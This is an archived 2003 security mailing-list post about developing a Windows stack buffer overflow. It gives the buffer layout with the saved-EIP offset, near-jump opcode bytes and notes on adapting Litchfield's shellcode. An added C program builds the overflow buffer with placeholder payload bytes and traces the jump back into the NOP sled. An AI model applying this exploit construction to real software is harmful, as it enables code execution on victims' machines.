In-Reply-To: <3EA57FD0.4010603at_private>

Thanks everyone for the help. Tried placing the shellcode at the end; it seemed to not overwrite EIP anymore, strange. Next, tried using a near jump and it works great (besides the fact that I haven't got the shellcode working quite right yet).

// Near jump to shellcode (approx 422 bytes, jmp near -422)
char jumpcode [] = "\xE9\x55\xFE\xFF\xFF";

My total buffer (460 bytes, 411-414 overwrite EIP) now looks like this (typical addresses):

Top of Stack   NOPS       Shellcode   EIP **     NOPS       jump
00fbfddd       fbfde9     fbfe07      fbff87     fbff88     fbff9c

I am attempting to use shellcode from the "Advanced Buffer Overflow" writeup by Litchfield (I changed the LoadLibrary and GetProcAddress calls to the right addresses). I'm worried that I won't have enough space (I have about 400 bytes to work with) if I decide to attempt to write my own shellcode.

Thanks for the assistance! I will let you know if everything goes well.

David

>How about just a short or near jmp? How many bytes between where EIP lands
>and your shellcode? I.E. jmp -128 or something? EB 80, I think.
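The jump-back-to-the-sled layout discussed in the message above, as an added worked example in C that is not part of the original post or of Litchfield's paper: it encodes E9/EB jumps the way the CPU interprets them (displacement measured from the instruction after the jump), rebuilds a 460-byte buffer with the same shape as the post's (NOP sled, shellcode, saved EIP at bytes 411-414, trailing NOPs, jmp near at the end pointing back into the sled), and traces where control lands. The base address 0x00FBFDE0, the 32-byte sled and the int3 placeholder payload are assumptions for the example, not the poster's values.

```c
/* Added example, not code from the thread. Build: cc -std=c99 jmp.c && ./a.out */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define BUF_LEN   460          /* total overflow buffer, as in the post            */
#define RET_OFF   410          /* bytes 411-414 (1-based) overwrite the saved EIP  */
#define SLED_LEN  32           /* assumed size of the leading NOP sled             */
#define JMP_LEN   5            /* E9 rel32                                         */
#define BASE      0x00FBFDE0u  /* assumed stack address of buf[0]                  */

/* jmp near rel32 (E9 xx xx xx xx): rel32 is relative to the address of the
 * NEXT instruction (from + 5). That is why a jump landing 422 bytes before
 * the jmp itself carries 0xFFFFFE55 (-427), as in the post's bytes. */
size_t encode_jmp_near(uint8_t *out, uint32_t from, uint32_t to)
{
    uint32_t rel = to - (from + 5);            /* two's-complement wrap intended */
    out[0] = 0xE9;
    for (int i = 0; i < 4; i++) out[1 + i] = (uint8_t)(rel >> (8 * i));
    return 5;
}

/* Prefer the 2-byte short form (EB rel8) when the displacement fits. */
size_t encode_jmp(uint8_t *out, uint32_t from, uint32_t to)
{
    int32_t rel = (int32_t)(to - (from + 2));
    if (rel >= -128 && rel <= 127) {
        out[0] = 0xEB;
        out[1] = (uint8_t)(int8_t)rel;
        return 2;
    }
    return encode_jmp_near(out, from, to);
}

/* Decode the jmp at *code (which sits at address at) and return its target. */
uint32_t jmp_target(const uint8_t *code, uint32_t at)
{
    if (code[0] == 0xEB) return at + 2 + (uint32_t)(int8_t)code[1];
    if (code[0] == 0xE9) {
        uint32_t rel = 0;
        for (int i = 0; i < 4; i++) rel |= (uint32_t)code[1 + i] << (8 * i);
        return at + 5 + rel;
    }
    return 0;
}

/* Encode with the shortest form, decode it again, return the encoded length
 * (0 if the round trip does not land on the requested target). */
size_t jmp_round_trips(uint32_t from, uint32_t to)
{
    uint8_t out[5];
    size_t n = encode_jmp(out, from, to);
    return jmp_target(out, from) == to ? n : 0;
}

/* Layout: [NOP sled][placeholder payload][ret -> trailing NOPs][NOPs][jmp back].
 * The payload is constructed filler (int3 bytes), not a real shellcode. */
void build_buffer(uint8_t *buf)
{
    memset(buf, 0x90, BUF_LEN);
    memset(buf + SLED_LEN, 0xCC, RET_OFF - SLED_LEN);     /* placeholder payload */
    uint32_t ret = BASE + RET_OFF + 4;      /* saved EIP -> first trailing NOP   */
    for (int i = 0; i < 4; i++) buf[RET_OFF + i] = (uint8_t)(ret >> (8 * i));
    uint32_t jmp_at = BASE + BUF_LEN - JMP_LEN;
    encode_jmp_near(buf + BUF_LEN - JMP_LEN, jmp_at, BASE + SLED_LEN / 2);
}

uint32_t read_ret(const uint8_t *buf)
{
    uint32_t v = 0;
    for (int i = 0; i < 4; i++) v |= (uint32_t)buf[RET_OFF + i] << (8 * i);
    return v;
}

/* Follow execution from start: slide over NOPs, take any jmp, and stop at the
 * first byte that is neither. Returns 0 if control leaves the buffer. */
uint32_t trace_landing(const uint8_t *buf, uint32_t start)
{
    uint32_t pc = start;
    for (int hops = 0; hops < 4; hops++) {
        while (pc - BASE < BUF_LEN && buf[pc - BASE] == 0x90) pc++;
        if (pc - BASE >= BUF_LEN) return 0;             /* ran off the buffer */
        uint8_t op = buf[pc - BASE];
        if (op != 0xE9 && op != 0xEB) return pc;        /* first payload byte */
        pc = jmp_target(buf + (pc - BASE), pc);
    }
    return 0;
}

uint32_t demo_ret(void)     { uint8_t b[BUF_LEN]; build_buffer(b); return read_ret(b); }
uint32_t demo_landing(void) { uint8_t b[BUF_LEN]; build_buffer(b); return trace_landing(b, read_ret(b)); }
size_t   payload_room(void) { return RET_OFF - SLED_LEN; }   /* bytes left for shellcode */

int main(void)
{
    printf("saved EIP -> %08x, lands at %08x, payload starts at %08x, room %zu bytes\n",
           demo_ret(), demo_landing(), BASE + SLED_LEN, payload_room());
    return demo_landing() == BASE + SLED_LEN ? 0 : 1;
}
```

Exit status 0 means the traced control flow (saved EIP, trailing NOPs, jmp near, sled) reaches the first payload byte. Decoding the post's own bytes E9 55 FE FF FF at 0x00fbff9c gives 0x00fbfdf6, 422 bytes before the jmp, which is inside the poster's sled (fbfde9-fbfe07); the displacement field itself is -427 because it is counted from the byte after the 5-byte instruction.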
This archive was generated by hypermail 2b30 : Thu Apr 24 2003 - 13:00:06 PDT